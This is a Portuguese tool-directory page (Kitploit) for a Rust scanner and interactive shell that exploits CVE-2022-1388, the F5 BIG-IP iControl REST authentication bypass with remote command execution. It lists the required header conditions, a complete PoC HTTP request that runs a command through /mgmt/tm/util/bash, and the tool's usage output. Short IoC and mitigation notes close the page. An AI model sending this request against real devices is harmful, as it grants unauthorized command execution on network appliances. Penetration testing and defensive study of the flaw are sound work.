Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-1388-rs — CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE escrito em Rust | Kitploit
Ferramentas/GitHubGitHub/aancw/cve-2022-1388-rs
Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed Teaming
GitHubaancw/cve-2022-1388-rs

CVE-2022-1388-rs

CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE escrito em Rust

Ver Repositório
25há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-1388-rs

Scanner e shell interativo para CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE escrito em Rust

Resumo

Para concluir, aqui está uma visão geral das condições necessárias de uma solicitação para explorar esta vulnerabilidade:

  • O cabeçalho Connection deve incluir X-F5-Auth-Token
  • O cabeçalho X-F5-Auth-Token deve estar presente
  • O cabeçalho Host deve ser localhost / 127.0.0.1 ou o cabeçalho Connection deve incluir X-Forwarded-Host
  • O cabeçalho Auth deve ser definido com o nome de usuário admin e qualquer senha

PoC

root@kitploit:~
POST /mgmt/tm/util/bash HTTP/1.1
Host: 127.0.0.1
Authorization: Basic YWRtaW46aG9yaXpvbjM=
X-F5-Auth-Token: thisisrandomstring
User-Agent: curl/7.82.0
Connection: X-F5-Auth-Token
Accept: */*
Content-Length: 39
{
    "command":"run",
    "utilCmdArgs":"-c id"
}

Configuração do LAB

  • Você pode encontrar o laboratório aqui

Uso

root@kitploit:~
$ cve_2022_1308_rs -h

CVE-2022-1388 PoC 1.0
Petruknisme <[email protected]>
Scanner and Interactive shell for CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in
Rust

USAGE:
    cve_2022_1388_rs [OPTIONS] --url <URL>

OPTIONS:
    -h, --help         Print help information
    -s, --shell        This mode for accessing payload with interactive shell
    -u, --url <URL>    F5 Big-IP target url
    -V, --version      Print version information

Requisitos

  • Rust
  • Cargo

IoCs

Os IoCs podem ser encontrados no arquivo de log /var/log/audit. Comandos não reconhecidos executados pelo endpoint mgmt/tm/util/bash devem ser motivo de preocupação.

Mitigação

Atualize para a versão mais recente ou mitigue o problema seguindo as instruções do F5 Security Advisory

  • https://support.f5.com/csp/article/K23605346

Referências

  • https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
Baixar ferramenta